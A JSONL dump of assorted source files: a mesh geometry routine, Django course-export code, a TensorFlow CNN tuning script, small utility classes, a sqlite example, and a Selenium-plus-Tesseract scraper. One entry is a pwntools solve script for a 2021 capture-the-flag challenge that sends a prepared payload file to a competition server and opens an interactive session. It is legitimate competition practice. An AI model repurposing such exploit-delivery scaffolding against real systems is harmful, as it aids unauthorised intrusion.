np.hstack([triangles[:, 0], triangles[:, 1], triangles[:, 2]])\n vts_j = np.hstack([triangles[:, 1], triangles[:, 2], triangles[:, 0]])\n triangles_index = np.tile(np.arange(len(triangles)), 3)\n vv_t_map = csc_matrix((triangles_index, (vts_i, vts_j)), shape=(vertices.shape[0], vertices.shape[0]))\n\n t_normals = triangles_normal(triangles, vertices, True)\n\n e_angles = np.sum(np.squeeze(t_normals[vv_t_map[vts_i, vts_j]] * t_normals[vv_t_map[vts_j, vts_i]]), axis=1)\n # clamp to 1 due to float precision\n e_angles = np.arccos(np.minimum(1, e_angles))\n\n vv_t_angle_map = csc_matrix((e_angles, (vts_i, vts_j)), shape=(vertices.shape[0], vertices.shape[0]))\n return vv_t_angle_map\n","sub_path":"trimeshpy/math/angle.py","file_name":"angle.py","file_ext":"py","file_size_in_byte":6423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"306909257","text":"from pwn import *\r\n\r\nelf = ELF('./sandbox')\r\n\r\nif args.GDB:\r\n\tp = gdb.debug(elf.path, '\\n'.join([\r\n\t\t\"b *run_sandbox+173\",\r\n\t\t\"c\",\r\n\t]))\r\nelif args.REMOTE:\r\n\tp = remote(\"ecsc21.hack.cert.pl\", 25732)\r\nelse:\r\n\tp = process(elf.path) \r\n\r\n\r\nwith open(\"./payload\", \"rb\") as f:\r\n\tpayload = f.read()\r\n\r\np.sendafter(b\"[+] Reading ELF\\n\", p32(len(payload)) + payload)\r\np.interactive()\r\n","sub_path":"ecsc_2021/clumsy_sandbox/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"389062099","text":"from django.conf import settings\nfrom django.core.urlresolvers import reverse\n\n\ndef url_to_exercise(request, course_key, exercise_key):\n return request.build_absolute_uri(\n reverse('exercise', args=[course_key, exercise_key]))\n\n\ndef url_to_model(request, course_key, exercise_key, parameter=None):\n return request.build_absolute_uri(\n reverse('model', args=[course_key, exercise_key, parameter or ''])\n )\n\n\ndef url_to_template(request, course_key, exercise_key, parameter=None):\n return request.build_absolute_uri(\n reverse('template', args=[course_key, exercise_key, parameter or ''])\n )\n\n\ndef url_to_static(request, course_key, path):\n ''' Creates an URL for a path in static files '''\n return request.build_absolute_uri(\n '{}{}/{}'.format(settings.STATIC_URL, course_key, path))\n\n\ndef chapter(request, course, of):\n ''' Exports chapter data '''\n of['url'] = url_to_static(request, course['key'], of['static_content'])\n return of\n\n\ndef exercise(request, course, exercise, of):\n ''' Exports exercise data '''\n if not \"title\" in of and not \"name\" in of:\n of[\"title\"] = exercise.get(\"title\", \"\")\n if not \"description\" in of:\n of[\"description\"] = exercise.get(\"description\", \"\")\n if \"url\" in exercise:\n of[\"url\"] = exercise[\"url\"]\n else:\n of[\"url\"] = url_to_exercise(request, course['key'], exercise['key'])\n\n of['exercise_info'] = {\n 'form_spec': form_fields(exercise),\n 'resources': [url_to_static(request, course['key'], p) for p in exercise.get('resource_files', [])],\n }\n\n if 'model_answer' in exercise:\n of['model_answer'] = exercise['model_answer']\n elif 'model_files' in exercise:\n file_names = [path.split('/')[-1] for path in exercise['model_files']]\n of['model_answer'] = ' '.join([\n url_to_model(request, course['key'], exercise['key'], name)\n for name in file_names\n ])\n elif exercise.get('view_type', None) == 'access.types.stdsync.createForm':\n of['model_answer'] = url_to_model(\n request, course['key'], exercise['key']\n )\n\n if 'template' in exercise:\n of['template'] = exercise['template']\n elif 'template_files' in exercise:\n file_names = [path.split('/')[-1] for path in exercise['template_files']]\n of['template'] = ' '.join([\n url_to_template(request, course['key'], exercise['key'], name)\n for name in file_names\n ])\n return of\n\n\ndef form_fields(exercise):\n ''' Describes a form that the configured exercise produces '''\n form = []\n t = exercise.get('view_type', None)\n\n def field_spec(f, n):\n field = {\n 'key': f.get('key', 'field_' + str(n)),\n 'type': f['type'],\n 'title': f['title'],\n 'required': f.get('required', False),\n }\n\n mods = f.get('compare_method', '').split('-')\n if 'int' in mods:\n field['type'] = 'number'\n elif 'float' in mods:\n field['type'] = 'number'\n elif 'regexp' in mods:\n field['pattern'] = f['correct']\n if 'more' in f:\n field['description'] = f['more']\n\n if 'options' in f:\n titleMap = {}\n enum = []\n m = 0\n for o in f['options']:\n v = o.get('value', 'option_' + str(m))\n titleMap[v] = o.get('label|i18n', o.get('label', ['missing']))\n enum.append(v)\n m += 1\n field['titleMap'] = titleMap\n field['enum'] = enum\n\n if 'extra_info' in f:\n field.update(f['extra_info'])\n\n if 'class' in field:\n field['htmlClass'] = field['class']\n del(field['class'])\n\n return field\n\n if t == 'access.types.stdsync.createForm':\n n = 0\n for fg in exercise.get('fieldgroups', []):\n for f in fg.get('fields', []):\n t = f['type']\n\n if t == 'table-radio' or t == 'table-checkbox':\n for row in f.get('rows', []):\n rf = f.copy()\n rf['type'] = t[6:]\n if 'key' in row:\n rf['key'] = row['key']\n if 'label' in row:\n rf['title'] += ': ' + row['label']\n form.append(field_spec(rf, n))\n n += 1\n\n if 'more_text' in rf:\n form.append({\n 'key': rf.get('key', 'field_' + str(n)) + '_more',\n 'type': 'text',\n 'title': rf['more_text'],\n 'required': False,\n })\n n += 1\n else:\n form.append(field_spec(f, n))\n n += 1\n\n elif t == 'access.types.stdasync.acceptPost':\n for f in exercise.get('fields', []):\n form.append({\n 'key': f['name'],\n 'type': 'textarea',\n 'title': f['title'],\n 'requred': f.get('required', False),\n })\n\n elif t == 'access.types.stdasync.acceptFiles':\n for f in exercise.get('files', []):\n form.append({\n 'key': f['field'],\n 'type': 'file',\n 'title': f['name'],\n 'required': f.get('required', True),\n })\n return form\n","sub_path":"util/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":5574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"199383897","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 24 12:19:05 2020\n\n@author: Kim Bjerge\n\"\"\"\n\n\n# %Reference - https://www.tensorflow.org/tensorboard/hyperparameter_tuning_with_hparams\n# Last accessed 18/12/19\n#https://stackoverflow.com/questions/38543850/tensorflow-how-to-display-custom-images-in-tensorboard-e-g-matplotlib-plots\n# Last accessed 18/12/19\n\n# activate moths\n# Anaconda: \n# conda install scikit-learn\n# conda install seaborn\n\n#%load_ext tensorboard\nimport tensorflow as tf\nimport io\n\n## LIMIT MEMORY - Can be uncommented\nconfig = tf.compat.v1.ConfigProto()\nconfig.gpu_options.per_process_gpu_memory_fraction = 0.4\nsession = tf.compat.v1.Session(config=config)\n\nfrom sklearn.metrics import classification_report, confusion_matrix\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sklearn\n\nfrom tensorboard.plugins.hparams import api as hp\n\nprint(tf.__version__)\nprint(sklearn.__version__)\n\n##\n\n# Directory with subdirectories for each class with cropped images in jpg format\ndata_dir = '../10classes_mixed'\n\n# Directory for saving tensorboard model parameters\nhparam_dir = '..\\\\hparam_tuning' # Windows path\n#hparam_dir = '../hparam_tuning' # Linux path\n\n# Directory for saving h5 models for each run\nmodels_dir = '../models_save'\n\ngen = True # Enable data augmentation\n\n##\n\nnumber_of_classes = 10\nbatch_size = 32\nepochs = 30\nimage_size = 128\nseed = 1\n\ntrain_datagen = tf.keras.preprocessing.image.ImageDataGenerator(rescale=1./255,\n rotation_range = 180,\n horizontal_flip = True,\n vertical_flip = True,\n zoom_range=0.3,\n validation_split=0.2,\n brightness_range = [0.9, 1.1])\n\ntrain_generator = train_datagen.flow_from_directory(\n data_dir,\n shuffle = True,\n target_size=(image_size, image_size),\n batch_size=batch_size,\n class_mode='categorical',\n subset='training',\n seed = seed)\n\nvalidation_datagen = tf.keras.preprocessing.image.ImageDataGenerator(rescale=1./255) \nvalidation_generator = train_datagen.flow_from_directory(\n data_dir,\n target_size=(image_size, image_size),\n batch_size=batch_size,\n class_mode='categorical',\n subset='validation',\n shuffle=False,\n seed=seed\n)\n\n##\n\n# Selected best model finnaly used (Paper rating no. 3)\nHP_OPTIMIZER = hp.HParam('optimizer', hp.Discrete(['adam']))\nHP_KERNEL_SIZE1 = hp.HParam('kern_size1', hp.Discrete([5]))\nHP_KERNEL_SIZE2 = hp.HParam('kern_size2', hp.Discrete([3]))\nHP_NUM_FILTERS1 = hp.HParam('num_filters1', hp.Discrete([32])) \nHP_NUM_FILTERS2 = hp.HParam('num_filters2', hp.Discrete([64])) \nHP_NUM_UNITS = hp.HParam('num_units', hp.Discrete([512]))\n\n# Hyperparameter tuning used to find optimal model\n#HP_OPTIMIZER = hp.HParam('optimizer', hp.Discrete(['adam','sgd']))\n#HP_KERNEL_SIZE1 = hp.HParam('kern_size1', hp.Discrete([3,5]))\n#HP_KERNEL_SIZE2 = hp.HParam('kern_size2', hp.Discrete([1,3]))\n#HP_NUM_FILTERS1 = hp.HParam('num_filters1', hp.Discrete([32, 64])) \n#HP_NUM_FILTERS2 = hp.HParam('num_filters2', hp.Discrete([64, 128])) \n#HP_NUM_UNITS = hp.HParam('num_units', hp.Discrete([256, 512]))\n\nMETRIC_ACCURACY = 'accuracy'\nMETRIC_F1 = 'f1'\n \nwith tf.summary.create_file_writer(hparam_dir).as_default():\n hp.hparams_config(\n hparams=[HP_NUM_UNITS,\n HP_OPTIMIZER,\n HP_NUM_FILTERS1,\n HP_NUM_FILTERS2,\n HP_KERNEL_SIZE1,\n HP_KERNEL_SIZE2],\n metrics=[hp.Metric(METRIC_ACCURACY, display_name='Accuracy'), hp.Metric(METRIC_F1, display_name='F1 Score')],\n )\n \n##\n\ndef train_test_model(logdir, hparams, count): \n model = tf.keras.models.Sequential()\n #Block 1\n model.add(tf.keras.layers.Conv2D(hparams[HP_NUM_FILTERS1], kernel_size=hparams[HP_KERNEL_SIZE1], input_shape=(image_size,image_size, 3), padding='same'))\n model.add(tf.keras.layers.ReLU())\n model.add(tf.keras.layers.MaxPooling2D(pool_size=(2, 2)))\n #Block 2 \n model.add(tf.keras.layers.Conv2D(64, kernel_size=(3,3), input_shape=(image_size,image_size, 3),padding='same'))\n model.add(tf.keras.layers.ReLU())\n model.add(tf.keras.layers.MaxPooling2D(pool_size=(2, 2)))\n #Block 3 \n model.add(tf.keras.layers.Conv2D(64, kernel_size=(3,3), input_shape=(image_size,image_size, 3),padding='same'))\n model.add(tf.keras.layers.ReLU())\n model.add(tf.keras.layers.MaxPooling2D(pool_size=(2, 2)))\n #Block 4\n model.add(tf.keras.layers.Conv2D(hparams[HP_NUM_FILTERS2], hparams[HP_KERNEL_SIZE2], input_shape=(image_size,image_size, 3),padding='same'))\n model.add(tf.keras.layers.ReLU())\n model.add(tf.keras.layers.MaxPooling2D(pool_size=(2, 2)))\n #Dense\n model.add(tf.keras.layers.Flatten())\n model.add(tf.keras.layers.Dense(hparams[HP_NUM_UNITS], activation='relu'))\n model.add(tf.keras.layers.Dropout(0.3))\n #Output\n model.add(tf.keras.layers.Dense(number_of_classes, activation='softmax')) # NUM CLASSES\n #model.add(tf.keras.layers.Dense(10,activation='sigmoid')) # NUM CLASSES\n model.compile(optimizer=hparams[HP_OPTIMIZER],\n loss='categorical_crossentropy',\n metrics=['accuracy'])\n \n model.summary()\n print(\"Learnable parameters:\", model.count_params())\n \n if not gen:\n model.fit(x_train, y_train, \n epochs = epochs,\n batch_size = batch_size,\n callbacks=[tf.keras.callbacks.TensorBoard(logdir),#log metrics \n hp.KerasCallback(logdir, hparams), #log hparams\n ],)\n _, accuracy = model.evaluate(x_test, y_test)\n y_predicted = model.predict(x_test)\n y_pred = np.argmax(y_predicted, axis=1)\n y_true = np.argmax(y_test, axis=1)\n \n print(y_pred.shape)\n print(y_true.shape)\n report = classification_report(y_true, y_pred, output_dict=True)\n print(classification_report(y_true, y_pred))\n f1_score = report['weighted avg']['f1-score']\n return accuracy, f1_score, y_pred\n else:\n train_datagen = tf.keras.preprocessing.image.ImageDataGenerator(rescale=1./255,\n rotation_range = 180,\n horizontal_flip = True,\n vertical_flip = True,\n zoom_range=0.3,\n validation_split=0.2,\n brightness_range = [0.9, 1.1])\n\n train_generator = train_datagen.flow_from_directory(\n data_dir,\n shuffle = True,\n target_size=(image_size, image_size),\n batch_size=batch_size,\n class_mode='categorical',\n subset='training',\n seed = seed)\n\n validation_datagen = tf.keras.preprocessing.image.ImageDataGenerator(rescale=1./255) \n validation_generator = train_datagen.flow_from_directory(\n data_dir,\n target_size=(image_size, image_size),\n batch_size=batch_size,\n class_mode='categorical',\n subset='validation',\n shuffle=False,\n seed=seed\n )\n print('Model train using generator')\n model.fit_generator(train_generator,\n steps_per_epoch=(1984//batch_size)*4,\n epochs=epochs,\n callbacks=[\n tf.keras.callbacks.TensorBoard(logdir), # log metrics\n hp.KerasCallback(logdir, hparams), # log hparams\n ],)\n print('Model evaluate')\n _, accuracy = model.evaluate_generator(validation_generator)\n print('Model predict')\n Y_pred = model.predict_generator(validation_generator) #, 173//batch_size+1\n y_pred = np.argmax(Y_pred, axis=1)\n print('Confusion Matrix')\n print(classification_report(validation_generator.classes, y_pred))\n report = classification_report(validation_generator.classes, y_pred, output_dict=True)\n f1_score = report['weighted avg']['f1-score']\n model.save(models_dir + '/' + str(count) + '.h5')\n return accuracy, f1_score, y_pred\n\n##\n \n#https://androidkt.com/keras-confusion-matrix-in-tensorboard/\ndef run(run_dir, hparams, count):\n if not gen:\n with tf.summary.create_file_writer(run_dir).as_default():\n hp.hparams(hparams) # record the values used in this trial\n accuracy, f1_score, y_pred = train_test_model(run_dir, hparams)\n tf.summary.scalar(METRIC_ACCURACY, accuracy, step=1)\n tf.summary.scalar(METRIC_F1, f1_score, step=1)\n conf = confusion_matrix(np.argmax(y_test, axis=1), y_pred)\n figure = plt.figure(figsize=(8, 8))\n sns.heatmap(conf, annot=True,cmap=plt.cm.Blues)\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n buf = io.BytesIO()\n plt.savefig(buf, format='png')\n plt.close(figure)\n buf.seek(0)\n image = tf.image.decode_png(buf.getvalue(), channels=4)\n image = tf.expand_dims(image, 0)\n tf.summary.image(\"Confusion Matrix/scoref1:_\" + str(f1_score), image, step=1)\n else:\n with tf.summary.create_file_writer(run_dir).as_default():\n hp.hparams(hparams) # record the values used in this trial\n accuracy, f1_score, y_pred = train_test_model(run_dir, hparams, count)\n tf.summary.scalar(METRIC_ACCURACY, accuracy, step=1)\n tf.summary.scalar(METRIC_F1, f1_score, step=1)\n conf = confusion_matrix(validation_generator.classes, y_pred)\n figure = plt.figure(figsize=(8, 8))\n sns.heatmap(conf, annot=True,cmap=plt.cm.Blues)\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n buf = io.BytesIO()\n plt.savefig(buf, format='png')\n plt.close(figure)\n buf.seek(0)\n image = tf.image.decode_png(buf.getvalue(), channels=4)\n image = tf.expand_dims(image, 0)\n tf.summary.image(\"Confusion Matrix/scoref1:_\" + str(f1_score) + '_run_' + str(count), image, step=1)\n \n##\n \nsession_num = 0\nfor num_units in HP_NUM_UNITS.domain.values:\n for optimizer in HP_OPTIMIZER.domain.values:\n for kern_size1 in HP_KERNEL_SIZE1.domain.values:\n for kern_size2 in HP_KERNEL_SIZE2.domain.values:\n for num_filters1 in HP_NUM_FILTERS1.domain.values:\n for num_filters2 in HP_NUM_FILTERS2.domain.values:\n hparams = {\n HP_NUM_UNITS: num_units,\n HP_OPTIMIZER: optimizer,\n HP_KERNEL_SIZE1: kern_size1,\n HP_KERNEL_SIZE2: kern_size2,\n HP_NUM_FILTERS1: num_filters1,\n HP_NUM_FILTERS2: num_filters2\n }\n run_name = \"run-%d\" % session_num\n print('--- Starting trial: %s' % run_name)\n print({h.name: hparams[h] for h in hparams})\n run(hparam_dir + '\\\\' + run_name, hparams, session_num) # Windows path\n #run(hparam_dir + '/' + run_name, hparams, session_num) # Linux path\n session_num += 1\n \n#model.summary()\n","sub_path":"code/hp_param_training.py","file_name":"hp_param_training.py","file_ext":"py","file_size_in_byte":11401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"507426355","text":"from source.util.utils import Utils\n\n# Holds structure for a Level\n\n\nclass Level:\n def __init__(self, lid, name, rank, min_skill, max_skill, price=0, min_xp_level=0):\n self.__id = int(lid)\n self.__name = name\n self.__rank = rank\n self.__price = int(price)\n self.__min_skill = int(min_skill)\n self.__max_skill = int(max_skill)\n self.__min_xp_level = int(min_xp_level)\n self.__trainer_ids = []\n self.__quest_ids = []\n self.__item_id = 0\n\n # Get the id of the level\n def get_id(self):\n return self.__id\n\n def get_name(self):\n return self.__name\n\n # Returns the total amount of sources\n def get_total_amount_of_sources(self, shared_items):\n total_amount = len(self.__trainer_ids)\n if len(self.__quest_ids) > 0:\n total_amount += 1\n if self.__item_id > 0:\n total_amount += shared_items[self.__item_id].get_total_amount_of_sources(shared_items)\n\n return total_amount\n\n # Returns the max amount of sources and its type\n def get_max_amount_of_one_source(self, shared_items):\n max_type = \"Trainer\"\n max_amount = len(self.__trainer_ids)\n if len(self.__quest_ids) > 0 and max_amount < 1:\n max_amount = 1\n max_type = \"Quest\"\n if self.__item_id > 0:\n item_amount = shared_items[self.__item_id].get_max_amount_of_one_source(shared_items)\n if item_amount[0] > max_amount:\n max_amount = item_amount[0]\n max_type = \"Item - \" + item_amount[1]\n\n return [max_amount, max_type]\n\n # Get the item id of the level\n def get_item_id(self):\n return self.__item_id\n\n # Returns the amount of different ways the item can be obtained\n def get_amount_of_different_sources(self):\n amount_sources = 0\n if len(self.__trainer_ids) > 0:\n amount_sources += 1\n if len(self.__quest_ids) > 0:\n amount_sources += 1\n if self.__item_id > 0:\n amount_sources += 1\n return amount_sources\n\n # set the quest from which skill is obtained\n def add_quest_id(self, quest_id):\n if quest_id not in self.__quest_ids:\n self.__quest_ids.append(int(quest_id))\n self.__quest_ids = sorted(self.__quest_ids)\n\n def set_item_id(self, item_id):\n self.__item_id = int(item_id)\n\n # the the ids of the quests that learns the skill\n def get_quest_ids(self):\n return self.__quest_ids\n\n def get_rank(self):\n return self.__rank\n\n def get_amount_of_sources(self):\n amount_of_sources = len(self.__trainer_ids)\n amount_of_sources += len(self.__quest_ids)\n if self.__item_id > 0:\n amount_of_sources += 1\n\n return amount_of_sources\n\n def get_trainer_ids(self):\n return self.__trainer_ids\n\n def add_trainer_id(self, trainer_id):\n if trainer_id not in self.__trainer_ids:\n self.__trainer_ids.append(int(trainer_id))\n self.__trainer_ids = sorted(self.__trainer_ids)\n\n def as_string(self, indent=\"\"):\n as_str = indent + \"{\\n\"\n as_str += indent + \"\\tid = \" + str(self.__id) + \",\\n\"\n as_str += indent + \"\\tname = \" + '\"' + self.__rank + \" \" + self.__name + '\"' + \",\\n\"\n as_str += indent + \"\\tmin_skill = \" + str(self.__min_skill) + \",\\n\"\n as_str += indent + \"\\tmax_skill = \" + str(self.__max_skill) + \",\\n\"\n # only add if filled\n if self.__min_xp_level > 0:\n as_str += indent + \"\\tmin_xp_level = \" + str(self.__min_xp_level) + \",\\n\"\n if len(self.__trainer_ids) > 0:\n as_str += indent + \"\\ttrainers = {\\n\"\n as_str += indent + \"\\t\\tprice = \" + str(self.__price) + \",\\n\"\n as_str += indent + \"\\t\\tsources = { \" + Utils.get_list_as_string(self.__trainer_ids) + \"},\\n\"\n as_str += indent + \"\\t},\\n\"\n # add ids of quests if any\n if len(self.__quest_ids) > 0:\n as_str += indent + \"\\tquests = {\" + Utils.get_list_as_string(self.__quest_ids) + \"},\\n\"\n # only add if recipe is present\n if self.__item_id > 0:\n as_str += indent + \"\\titem = \" + str(self.__item_id) + \",\\n\"\n as_str += indent + \"},\\n\"\n\n return as_str\n","sub_path":"source/wow_object/level.py","file_name":"level.py","file_ext":"py","file_size_in_byte":4302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"602614548","text":"from Instrucciones.TablaSimbolos.Instruccion import Instruccion\n\nclass CreateTable(Instruccion):\n def __init__(self, id, tipo, campos, ids, linea, columna):\n Instruccion.__init__(self,tipo,linea,columna)\n self.valor = id\n self.campos = campos\n self.ids = ids\n\n def ejecutar(self, tabla, arbol):\n super().ejecutar(tabla,arbol)\n print(self.valor + \" linea: \" + str(self.linea) + \" columna: \" + str(self.columna))\n'''\ninstruccion = CreateTable(\"hola mundo\",None, 1,2)\n\ninstruccion.ejecutar(None,None)\n'''","sub_path":"parser/team08/Tytus_SQLPARSER_G8/Instrucciones/Sql_create/CreateTable.py","file_name":"CreateTable.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"531695650","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('replays', '0046_auto_20150128_1858'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='ownerdata',\n name='teamuser',\n field=models.ForeignKey(related_name='owner', blank=True, to='replays.TeamUser', null=True),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='replay',\n name='upload_date',\n field=models.DateTimeField(default=datetime.datetime(2015, 1, 28, 19, 1, 50, 656000), null=True, blank=True),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='textpost',\n name='upload_date',\n field=models.DateTimeField(default=datetime.datetime(2015, 1, 28, 19, 1, 50, 657000), null=True, blank=True),\n preserve_default=True,\n ),\n ]\n","sub_path":"replays/migrations/0047_auto_20150128_1901.py","file_name":"0047_auto_20150128_1901.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"469891455","text":"import time\nfrom urllib.request import urlretrieve\nimport subprocess\nfrom selenium import webdriver\n\ndriver = webdriver.PhantomJS(executable_path='C:/Users/user/Downloads/phantomjs-2.1.1-windows/phantomjs-2.1.1-windows/bin/phantomjs.exe')\ndriver.get('http://www.amazon.com/War-Peace-Leo-Nikolayevich-Tolstoy/dp/1427030200')\ntime.sleep(2)\n\ndriver.find_element_by_id('sitbLogoImg').click()\nimageList = set()\n\ntime.sleep(5)\n#Пока кнопка со стрелкой вправо кликабельна, переворачиваем страницу\nwhile 'pointer' in driver.find_element_by_id('sitbReaderRightPageTurner').get_attribute('style'):\n driver.find_element_by_id(\"sitbReaderRightPageTurner\").click()\n time.sleep(2)\n #Ищем URL-адреса изображений на всех загруженных страницах (могут загрузиться сразу несколько страниц, но дупликаты не будут добавлены в набор)\n pages = driver.find_elements_by_xpath(\"//div[@class='pageImage']/div/img\")\n print(pages)\n for page in pages:\n print(page.get_attribute('src'))\n image = page.get_attribute('src')\n imageList.add(image)\n\ndriver.quit()\n\n# Начинаем обработку изображений, собранных с URL-адресов, с помощью Tesseract\n\nfor image in sorted(imageList):\n urlretrieve(image, 'page.jpg')\n p = subprocess.Popen(['tesseract', 'page.jpg', 'page'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n p.wait()\n f = open('page.txt', 'r')\n print(f.read())","sub_path":"work_with_images/must_have_image_scraping.py","file_name":"must_have_image_scraping.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"403442853","text":"import random\nimport pyautogui\n\npyautogui.PAUSE = 0.5 #default pause between functions\n\ndef randomize_coord(coord):\n #Randomizes a single coordinate in a small range\n lower = coord - 3\n upper = coord + 3\n return random.randint(lower, upper)\n\ndef move_to_and_click(x, y, btn):\n #specify x coord, right coord, and left or right mouse button\n if btn == 'right':\n pyautogui.moveTo(x, y)\n pyautogui.click(x, y, button=btn)\n else: #defaults to left click\n pyautogui.moveTo(x,y)\n pyautogui.click(x,y)\n print('Left Clicking Coordinates X={} Y={}'.format(x,y))\n\ndef rand_float(start, end):\n rf = random.random() * (end - start) + start\n print('Sleeping {} Seconds'.format(str(round(rf, 2)))) #rounds float to two decimal places\n return rf","sub_path":"randomizers.py","file_name":"randomizers.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"526161550","text":"class Arithmatic:\t\t\t\t#class defination\r\n\tvalue = 101\t\t\t\t\t#class variable\r\n\tdef __init__(self, i, j):\t\t\t#class constructor\r\n\t\tprint(\"Inside constructor\")\r\n\t\tself.no1=i \t\t\t\t#class instance variable\r\n\t\tself.no2=j\t\t\t\t#class instance variable\r\n\tdef Add(self):\t\t\t\t#instance method\t\r\n\t\treturn self.no1+self.no2\r\n\r\n\tdef Sub(self):\t\t\t\t#instance method\r\n\t\treturn self.no1-self.no2\r\n\t\r\ndef main():\r\n\tprint(\"Value is:\",Arithmatic.value)\r\n\t\r\n\tobj1 = Arithmatic(21,11)\t\t#__init__(obj1,21,11)\r\n\tobj2 = Arithmatic(101,51) \t\t#__init__(obj2,101,51)\r\n\tprint(\"Value is:\",obj1.value)\r\n\r\n\tret = obj1.Add()\r\n\tprint(\"Addition is:\",ret)\t\t\t\t#ret = Add(obj1)\r\n\tret = obj1.Sub()\r\n\tprint(\"Substraction is:\",ret)\r\n\r\n\tret = obj2.Add()\r\n\tprint(\"Addition is:\",ret)\t\t\t\t#ret = Add(obj1)\r\n\tret = obj2.Sub()\r\n\tprint(\"Substraction is:\",ret)\r\n\r\n\r\nif __name__ == '__main__':\r\n\t\tmain()\t","sub_path":"OOP4.py","file_name":"OOP4.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"393802748","text":"\n\nfrom xai.brain.wordbase.verbs._rule import _RULE\n\n#calss header\nclass _RULES(_RULE, ):\n\tdef __init__(self,): \n\t\t_RULE.__init__(self)\n\t\tself.name = \"RULES\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"rule\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_rules.py","file_name":"_rules.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"538891262","text":"# -*- coding: utf8 -*-\n\n# import configuration in parent dir\nimport os, sys, inspect\n\ncurrent_dir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\nparent_dir = os.path.dirname(current_dir)\nsys.path.insert(0, parent_dir)\nimport configuration as conf\n# import packages in models\nfrom models import data_processing, database_management, file_management\n\nif __name__ == '__main__':\n # change working directory to project location\n abspath = os.path.abspath(__file__)\n dname = os.path.dirname(os.path.dirname(abspath))\n os.chdir(dname)\n\n # script parameters\n searching_type = sys.argv[1]\n search_element = sys.argv[2]\n search_content = sys.argv[3]\n if_export = sys.argv[4]\n export_path = sys.argv[5]\n\n config = conf.auto_log_in(\"cardo_main\")\n\n # main process starts\n simple_connection = database_management.SimpleConnection(config)\n\n search = \"是否計算黑名單\" if searching_type == \"0\" else \"CARDO點數\"\n\n if if_export == \"0\":\n simple_connection.point_search(search, search_element, search_content)\n else:\n simple_connection.point_search(search, search_element, search_content, export_path)\n","sub_path":"DBUIScripts/black_list_search.py","file_name":"black_list_search.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"555532925","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 11 15:34:18 2015\n\n@author: RNEL\n\"\"\"\n\nimport sys\n\nPY2 = int(sys.version[0]) == 2\n\nif PY2:\n import urlparse\n urlparse = urlparse\nelse:\n import urllib.parse\n urlparse = urllib.parse\n\ndef encode_if_py2(func):\n \"\"\"If Python 2.x, return decorated function encoding unicode return value\n to UTF-8; else noop.\n \"\"\"\n if not PY2:\n return func\n def wrapped(*args, **kwargs):\n ret = func(*args, **kwargs)\n if not isinstance(ret, unicode):\n raise TypeError('Wrapped function must return `unicode`')\n return ret.encode('utf-8', 'ignore')\n return wrapped\n \ndef get_opening_tag_text(tag,attrs_to_include=None):\n \n \"\"\"\n This returns the text for an opening tag.\n e.g. if the opening tag was \n This would literally retun that tag string, \n rather than an \"anchor\" tag with a \"href\" attribute\n \n I couldn't find out how to do this throuh Beautifulsoup\n \"\"\"\n \n if attrs_to_include is None:\n return '<%s %s>' % (tag.name,' '.join(['%s=\"%s\"'%(key,value) for key,value in tag.attrs.items()]))\n else:\n return '<%s %s>' % (tag.name,' '.join(['%s=\"%s\"'%(key,value) for key,value in tag.attrs.items() if key in attrs_to_include]))","sub_path":"pyWebForm/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"303493755","text":"#!/usr/bin/env python\n\nimport sqlite3\n\nwith sqlite3.connect(\"../DATA/presidents.db\") as s3conn: # <1>\n\n s3cursor = s3conn.cursor() # <2>\n\n # select first name, last name from all presidents\n s3cursor.execute('''\n select firstname, lastname, party\n from presidents\n ''') # <3>\n\n print(\"Sqlite3 does not provide a row count\\n\") # <4>\n \n for row in s3cursor.fetchall(): # <5>\n print(row) # <6>\n\n\n try:\n s3cursor.execute(\"\"\"\n update presidents insert (lastname, firstname)\n values ('Scott', 'Ion')\n \"\"\")\n except sqlite3.DatabaseError as err:\n s3conn.rollback()\n else:\n s3conn.commit()\n","sub_path":"EXAMPLES/db_sqlite_basics.py","file_name":"db_sqlite_basics.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} 